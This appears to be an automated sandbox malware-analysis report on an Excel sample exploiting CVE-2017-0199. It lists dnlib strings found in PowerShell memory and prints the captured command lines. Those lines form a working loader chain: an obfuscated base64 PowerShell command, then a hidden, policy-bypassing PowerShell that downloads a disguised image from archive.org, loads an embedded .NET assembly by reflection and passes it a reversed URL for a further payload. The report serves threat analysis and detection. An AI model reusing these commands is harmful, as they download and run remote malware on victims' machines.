                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: F9430000.0.drInitial sample: OLE indicators vbamacros = False
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsxInitial sample: OLE indicators encrypted = True

                  Data Obfuscation

                  barindex
                  Suspicious powershell command line found
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
